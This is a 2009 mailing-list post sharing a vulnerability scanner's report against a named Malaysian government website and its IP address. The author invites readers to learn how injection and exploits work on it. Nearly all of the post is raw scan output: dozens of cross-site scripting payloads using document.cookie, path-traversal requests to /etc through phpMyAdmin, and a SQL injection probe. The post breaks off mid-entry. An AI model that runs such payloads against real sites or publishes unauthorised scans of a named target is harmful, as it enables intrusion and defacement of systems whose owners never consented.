[PCBSD-malaysia] Government Web Vulnerable?
Mohd Fazli Azran Abd Malek
mfazliazran at gmail.com
Thu Sep 3 10:29:05 PDT 2009
Hi everyone,
I scanned one website that maybe someone is interested in. When I see this
server, it is not weird that this web was defaced many times... I share
this web with you all. This is one of the government websites that I
scanned that has many vulnerabilities, and I hope others will know and learn how
injection and exploits can be used on applications and systems. Here is the
report of my scan:
---------------------------------------------------------------------------
+ Target IP: 202.186.96.231
+ Target Hostname: www.mardi.gov.my
+ Target Port: 80
+ Start Time: 2009-09-05 1:01:01
---------------------------------------------------------------------------
+ Server: lighttpd/1.5.0
+ No CGI Directories found (use '-C all' to force check all possible
dirs)
- Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-0: GET /help/ : Help directory should not be accessible
+ OSVDB-0: GET /vgn/jsp/jspstatus56 : Vignette CMS admin/maintenance
script available.
+ OSVDB-0: GET /typo3conf/ : This may contain sensitive Typo3 files.
+ OSVDB-0: GET /mysql/db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /3rdparty/phpMyAdmin/db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: GET /phpMyAdmin/db_details_importdocsql.php?
submit_show=true&do=import&docpath=../../../../../../../etc :
phpMyAdmin allows directory listings remotely. Upgrade to version
2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-0: GET /SUNWmc/htdocs/ : Sun SMC (Solaris Management Console)
is running.
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</
title><script>alert(document.cookie)</script> : Mambo PHP Portal/
Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?
option=search&searchword=<script>alert(document.cookie);</script> :
Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailnews.php?id=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/view.php?path=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=
\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?dir=<script>alert('Vulnerable')</script> :
Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-0: GET /https-admserv/bin/index?/
<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1
administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp?
cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x
JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</
script> : Mambo PHP Portal/Server is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</
script> : The PHP script soinfo.php is vulnerable to Cross Site
Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /servlet/MsgPage?
action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0
and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /servlets/MsgPage?
action=badlogin&msg=<script>alert('Vulnerable')</script> : The
NetDetector install is vulnerable to Cross Site Scripting (XSS) in
it's invalid login message. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de
%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?
tab1=TabsWebServer%26tab2=TabsWebLogSettings
%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=
\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is
vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=
\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to
Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?
\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to
Cross Site Scripting
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall
catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /templates/form_header.php?
noticemsg=<script>javascript:alert(document.cookie)</script> :
MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /supporter/index.php?
t=updateticketlog&id=<script><script>alert('Vulnerable')</
script></script> : MyHelpdesk from http://myhelpdesk.sourceforge.net/
versions v20020509 and older are vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?
t=tickettime&id=<script><script>alert('Vulnerable')</script></
script> : MyHelpdesk from http://myhelpdesk.sourceforge.net/
versions v20020509 and older are vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /supporter/index.php?
t=ticketfiles&id=<script><script>alert('Vulnerable')</
script></script> : MyHelpdesk from http://myhelpdesk.sourceforge.net/
versions v20020509 and older are vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /sunshop.index.php?
action=storenew&username=<script>alert('Vulnerable')</script> :
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup
page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</
script>&story=<script>alert('Vulnerable')</
script>&storyext=<script>alert('Vulnerable')</script>&op=Preview :
This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</
script> : Actinic E-Commerce services is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</
script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40
allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable
\")</script> : Bajie HTTP JServer is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: POST /servlet/CookieExample?
cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> :
Open Market Inc. ContentServer is vulnerable to Cross Site Scripting
(XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</
script> : Search agent allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</
script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /search.php?
searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the
latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</
script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</
script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error
pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /replymsg.php?
send=1&destin=<script>alert('Vulnerable')</script> : This version of
PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B
%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web
Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> :
phpWebSite 0.9.x and below are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] :
phpWebSite 0.9.x and below are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /phpwebsite/index.php?
module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+
\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below
are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phpwebsite/index.php?
module=calendar&calendar[view]=day&month=2&year=2003&day=1+
%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and
below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</
script> : PHPNuke add-on PHPToNuke is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</
script> : Contains PHP configuration information and is vulnerable to
Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</
script> : Contains PHP configuration information and is vulnerable to
Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpBB/viewtopic.php?
topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to
Cross Site Scripting (XSS), upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">
\"<script>javascript:alert(document.cookie)</script> : phpBB is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phorum/admin/header.php?
GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a
and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /phorum/admin/footer.php?
GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a
and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /netutils/whodata.stm?
sitename=<script>alert(document.cookie)</script> : Sambar Server
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /nav/cList.php?root=</
script><script>alert('Vulnerable')/<script> : RaQ3 server script is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /myphpnuke/links.php?
op=search&query=[script]alert('Vulnerable);[/script]?query= :
myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /myphpnuke/links.php?
op=MostPopular&ratenum=[script]alert(document.cookie);[/
script]&ratetype=percent : myphpnuke is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /myhome.php?
action=messages&box=<script>alert('Vulnerable')</script> : OpenBB
1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /msadm/user/login.php3?account_name=
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site
User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /msadm/site/index.php3?authid=
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site
Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=
\"><script>alert('Vulnerable')</script> : The Sendmail Server Site
Domain Administrator login is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules/Submit/index.php?
op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></
style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?
name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?
Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=
\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> :
The XForum (PHPNuke Add-on module) is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op=modload&name=Xforum&file=<script>alert('Vulnerable')</
script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</
script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> :
The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> :
This install of PHPNuke's modules.php is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> :
The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg
%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke
0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> :
The DMOZGateway (PHPNuke Add-on module) is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> :
Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</
script> : The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?
name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke
forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?
name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</
script>&month=3&month_l=test : The PHPNuke forum is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> :
The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> :
This install of PHPNuke is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> :
The PHPNuke forum is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg
%20src=javascript:alert(document.cookie);
%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-
Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x()
{v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</
script> : Megabook guestbook is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?
Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server
4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp?
NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is
vulnerable to cross site scripting (XSS) in the GetLastError function.
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /launch.asp?
NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is
vulnerable to cross site scripting (XSS) in the GetLastError function.
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /isapi/testisa.dll?
check1=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?file=Liens&op=
\"><script>alert('Vulnerable');</script> : Nuked-klan 1.3b is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php?
action=storenew&username=<script>alert('Vulnerable')</script> :
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup
page. CA-200-02.
+ OSVDB-0: GET /index.php/content/search/?
SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ
publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search :
eZ publish v3 and prior allow Cross Site Scripting (XSS).
http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /gallery/search.php?
searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the
latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /friend.php?
op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version
of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS).
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /forum_members.asp?find=
%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver.
7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> :
YaBB is vulnerable to Cross Site Scripting (XSS) in the
password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</
script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is
vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /download.php?
sortby=&dcategory=<script>alert('Vulnerable')</script> : This version
of PHP-Nuke's download.php is vulnerable to Cross Site Scripting
(XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</
script>&comment=<script>alert('Vulnerable')</
script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of
PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS).
Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /cleartrust/ct_logon.asp?
CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?
query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?
query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</
script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to Cross
Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=
\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=
\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E-
Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</
script> : With malformed URLS, Coldfusion is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /apps/web/vs_diag.cgi?
server=<script>alert('Vulnerable')</script> : Zeus 4.2r2
(webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /addressbook/index.php?
surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003
is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /addressbook/index.php?
name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is
vulnerable to Cross Site Scripting (XSS) in the error message if code
is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-9239: GET /mailman/admin/ml-name?
\"><script>alert('Vulnerable')</script>; : Mailmain is vulnerable to
Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site
content.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25497: GET /index.php?rep=<script>alert(document.cookie)</
script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</
script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)
vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-19947: GET /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> :
Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS).
http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12606: GET /index.php?err=3&email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /forgot_password.php?email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email=
\"><script>alert(document.cookie)</script> : MySQL Eventum is
vulnerable to XSS in the email field.
+ OSVDB-2119: GET /shopexd.asp?catalogid='42 : VP-ASP Shopping Cart
5.0 contains multiple SQL injection vulnerabilities. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560
, http://www.securityfocus.com/bid/8159
+ OSVDB-2562: GET /login/sm_login_screen.php?error=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=
